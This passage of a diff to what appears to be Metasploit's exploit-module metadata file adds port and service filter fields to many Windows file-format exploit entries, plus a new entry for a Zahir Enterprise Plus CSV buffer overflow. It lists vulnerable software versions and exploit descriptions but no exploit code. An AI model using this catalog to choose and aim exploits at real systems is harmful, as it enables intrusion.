"", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Csound 5.15 / Windows XP SP3 / Windows 7 SP1" ], @@ -72318,6 +94561,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "CuteZIP 2.1 / Windows Universal" ], @@ -72356,6 +94605,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows x64", @@ -72394,6 +94649,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "CyberLink Power2Go 8 (XP/Vista/win7) Universal" ], @@ -72428,6 +94689,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Cytel Studio 9.0" ], @@ -72466,6 +94733,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -72500,6 +94773,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Destiny Universal", "Windows XP SP2 Spanish" @@ -72534,6 +94813,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2" ], @@ -72568,6 +94853,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "DJ Studio Pro 5.1.6.5.2" ], @@ -72601,6 +94892,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -72632,6 +94929,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -72669,6 +94972,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "DVD X Player 5.5 Standard / Pro" ], @@ -72706,6 +95015,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / Windows 7 SP1 (DEP Bypass)" ], @@ -72739,6 +95054,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -72774,6 +95095,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ERS Viewer 2011 (v11.04) / Windows XP SP3 / Windows 7 SP1" ], @@ -72808,6 +95135,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR", "ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass" @@ -72846,6 +95179,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Win XP SP3 / Windows Vista / Windows 7" ], @@ -72878,6 +95217,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -72916,6 +95261,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -72950,6 +95301,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -72988,6 +95345,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Free Download Manager 3.0 (Build 844)" ], @@ -73026,6 +95389,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -73059,6 +95428,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Foxit PDF Reader v4.2 (Windows XP SP0-SP3)", @@ -73096,6 +95471,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Foxit Reader 3.0 Windows XP SP2" ], @@ -73135,6 +95516,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 10 Pro x64 Build 17134" ], @@ -73171,6 +95558,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Foxit Reader v4.1.1 XP Universal" ], @@ -73208,6 +95601,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 EN" ], @@ -73241,6 +95640,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Universal" ], @@ -73276,6 +95681,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -73308,6 +95719,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "GTA SA-MP (samp-server) v0.3.1.1" ], @@ -73343,6 +95760,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP English SP3" ], @@ -73378,6 +95801,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP English SP3" ], @@ -73415,6 +95844,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP English SP3" ], @@ -73447,6 +95882,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]", "HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]", @@ -73485,6 +95926,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HT-MP3Player 1.0" ], @@ -73520,6 +95967,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1" ], @@ -73553,6 +96006,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM WorkStation 5.9 (Windows XP SP3)", "IBM WorkStation 5.9 (Windows 7, Windows Vista)" @@ -73590,6 +96049,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IcoFX 2.5 / Windows 7 SP1" ], @@ -73628,6 +96093,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IDEAL Migration <= 4.5.1 on Windows XP", "IDEAL Administration <= 10.5 on Windows XP" @@ -73662,6 +96133,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -73698,6 +96175,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Irfanview 4.32 / Plugins 4.32 / Windows Universal" ], @@ -73732,6 +96215,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ispVM System 18.0.2 / Windows XP SP3 / Windows 7 SP1" ], @@ -73768,6 +96257,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "KingView 6.52 English / KingView 6.53 Free Trial / Kingmess.exe 65.20.2003.10300 / Windows XP SP3" ], @@ -73805,6 +96300,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "PAC-Designer 6.21 on Windows XP SP3" ], @@ -73841,6 +96342,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal", "Lotus Notes 8.5.2 FP2 / Windows Universal / DEP" @@ -73875,6 +96382,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal DEP & ASLR Bypass" ], @@ -73907,6 +96420,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -73941,6 +96460,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Internet Explorer" ], @@ -73976,6 +96501,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MediaCoder 0.8.21 - 0.8.22 / Windows XP SP3 / Windows 7 SP0" ], @@ -74009,6 +96540,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 - English", "Windows XP SP2 - English" @@ -74043,6 +96580,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / Vista / 7" ], @@ -74078,6 +96621,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -74114,6 +96663,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mini-stream RM-MP3 Converter v3.1.2.1.2010.03.30" ], @@ -74147,6 +96702,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal Generic DEP & ASLR Bypass" ], @@ -74180,6 +96741,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal Generic DEP & ASLR Bypass" ], @@ -74213,6 +96780,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -74247,6 +96820,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064" ], @@ -74281,6 +96860,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SMPlayer 0.6.8 / mplayer.exe Sherpya-SVN-r29355-4.5.0 / Windows XP English SP3" ], @@ -74318,6 +96903,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office 2002 (XP) SP3 base English on Windows XP SP3 English", "Microsoft Office 2002 (XP) SP3 w/kb969680 English on Windows XP SP3 English", @@ -74358,6 +96949,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft PowerPoint Viewer 2003", "Microsoft PowerPoint Viewer 2003 (kb949041 or kb956500) or Office 2003 SP3", @@ -74398,6 +96995,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office XP) on Windows XP SP3", "Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3" @@ -74437,6 +97040,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Microsoft Office 2002 SP3 English on Windows XP SP3 English", @@ -74480,6 +97089,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 SP0/SP4 English", @@ -74520,6 +97135,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office Excel 2007 on Windows XP", "Microsoft Office Excel 2007 SP2 on Windows XP" @@ -74558,6 +97179,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office Word 2007/2010 on Windows 7" ], @@ -74595,6 +97222,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English", "Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English" @@ -74634,6 +97267,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / Windows 2003 SP2" ], @@ -74670,6 +97309,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office 2010 SP2 English on Windows 7 SP1 English" ], @@ -74708,6 +97353,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP1 / Office 2010 SP2 / Office 2013" ], @@ -74744,6 +97395,12 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013" ], @@ -74780,6 +97437,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP1 / Office 2010 SP2 / Office 2013" ], @@ -74815,6 +97478,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -74847,6 +97516,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -74880,6 +97555,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2 English" ], @@ -74916,6 +97597,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 with Office Standard 2010" ], @@ -74948,6 +97635,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2-SP3 IE 7.0" ], @@ -74981,6 +97674,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal", "Windows Universal (SEH)", @@ -75015,6 +97714,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -75050,6 +97755,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -75083,6 +97794,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Nuance PDF Reader v6.x (XP SP3)" ], @@ -75115,6 +97832,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office" ], @@ -75149,6 +97872,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office" ], @@ -75201,6 +97930,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "All", "COM+ Services / Windows Vista - 10 / Office 2007 - 2016 (MS15-132)", @@ -75262,6 +97997,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office Word" ], @@ -75298,6 +98039,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "OpenOffice 2.3.1 / 2.3.0 on Windows XP SP3" ], @@ -75333,6 +98080,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Orbit Downloader 6.4 on Windows XP SP3", "Orbit Downloader 6.4 on Windows 7" @@ -75369,6 +98122,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Orbital Viewer 1.04 on Windows XP SP3" ], @@ -75404,6 +98163,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VMWare OVF Tools 2.1 on Windows XP SP3" ], @@ -75438,6 +98203,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -75474,6 +98245,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Photodex ProShow Producer 5.0.3256 / Windows XP SP3 / Windows 7 SP1" ], @@ -75508,6 +98285,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Publish-It 3.6d" ], @@ -75543,6 +98326,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3", "Windows 7/Windows Vista" @@ -75578,6 +98367,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / Real Player 15.0.5.109" ], @@ -75614,6 +98409,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2/SP3 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32" ], @@ -75647,6 +98448,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 English", "WinSrv 2000 SP4 English", @@ -75683,6 +98490,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / IE 7" ], @@ -75717,6 +98530,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -75752,6 +98571,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -75784,6 +98609,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "" ], @@ -75817,6 +98648,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -75851,6 +98688,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -75883,6 +98726,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -75919,6 +98768,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -75952,6 +98807,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -75989,6 +98850,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -76024,6 +98891,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal - Double-Click/Command Line Open Method", "Windows Universal - File->Open + Toolbar Open Methods" @@ -76060,6 +98933,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows - UltraISO v8.6.2.2011 portable", "Windows - UltraISO v8.6.0.1936" @@ -76095,6 +98974,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0" ], @@ -76131,6 +99016,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -76165,6 +99056,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VideoCharge Studio 2.12.3.685" ], @@ -76198,6 +99095,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VideoLAN VLC 0.9.4 (XP SP3 English)", "VideoLAN VLC 0.9.2 (XP SP3 English)" @@ -76234,6 +99137,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP/Vista/Win7/... Generic DEP & ASLR Bypass" ], @@ -76271,6 +99180,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Visio 2002 English on Windows XP SP3 Spanish", "Visio 2002 English on Windows XP SP3 English" @@ -76307,6 +99222,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3/Windows 7 SP0" ], @@ -76341,6 +99262,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VLC 1.1.8 on Windows XP SP3" ], @@ -76378,6 +99305,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VLC 0.9.4 on Windows XP SP3 / Windows 7 SP1" ], @@ -76413,6 +99346,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "vlc 0.9.9 on Windows XP SP3" ], @@ -76448,6 +99387,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VLC 1.1.6 on Windows XP SP3" ], @@ -76480,6 +99425,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VUPlayer 2.49" ], @@ -76512,6 +99463,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VUPlayer 2.49" ], @@ -76546,6 +99503,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 x32 - Watermark Master 2.2.23", "Windows 7 x64 - Watermark Master 2.2.23" @@ -76586,6 +99549,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Winamp 5.55 / Windows XP SP3 / Windows 7 SP1" ], @@ -76621,6 +99590,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -76656,6 +99631,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "WinXP SP3 Spanish (bypass DEP)", "WinXP SP2/SP3 English (bypass DEP)" @@ -76694,6 +99675,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Win32 Universal (Generic DEP & ASLR Bypass)" ], @@ -76727,6 +99714,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -76762,6 +99755,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2 / SP3" ], @@ -76800,6 +99799,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Xion Audio Player v1.0.126 XP Universal" ], @@ -76833,6 +99838,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -76846,6 +99857,45 @@ "notes": { } }, + "exploit_windows/fileformat/zahir_enterprise_plus_csv": { + "name": "Zahir Enterprise Plus 6 Stack Buffer Overflow", + "full_name": "exploit/windows/fileformat/zahir_enterprise_plus_csv", + "rank": 300, + "disclosure_date": "2018-09-28", + "type": "exploit", + "author": [ + "f3ci", + "modpr0be" + ], + "description": "This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.\n The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters\n via Import from other File. This results in overwriting a structured exception handler record.", + "references": [ + "CVE-2018-17408", + "EDB-45505" + ], + "is_server": true, + "is_client": false, + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], + "targets": [ + "Zahir Enterprise Plus 6 <= build 10b" + ], + "mod_time": "2018-10-04 10:10:09 +0000", + "path": "/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/zahir_enterprise_plus_csv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "exploit_windows/fileformat/zinfaudioplayer221_pls": { "name": "Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow", "full_name": "exploit/windows/fileformat/zinfaudioplayer221_pls", @@ -76868,6 +99918,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Zinf Universal 2.2.1" ], @@ -76901,6 +99957,12 @@ "platform": "Windows", "arch": "", "rport": 1, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Bruteforce", "Bruteforce iis-pam1.dll", @@ -76956,6 +100018,12 @@ "platform": "Windows", "arch": "", "rport": 44334, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP4 English", "Windows XP Pro SP0 English", @@ -76991,6 +100059,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP Universal" ], @@ -77026,6 +100100,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic", "Windows 2000 English", @@ -77064,6 +100145,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP SP3 Universal" ], @@ -77099,6 +100186,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic", "Windows XP SP2 ENG", @@ -77134,6 +100228,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252" ], @@ -77168,6 +100268,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Pro SP3 English" ], @@ -77204,6 +100310,13 @@ "platform": "Windows", "arch": "", "rport": 21, + 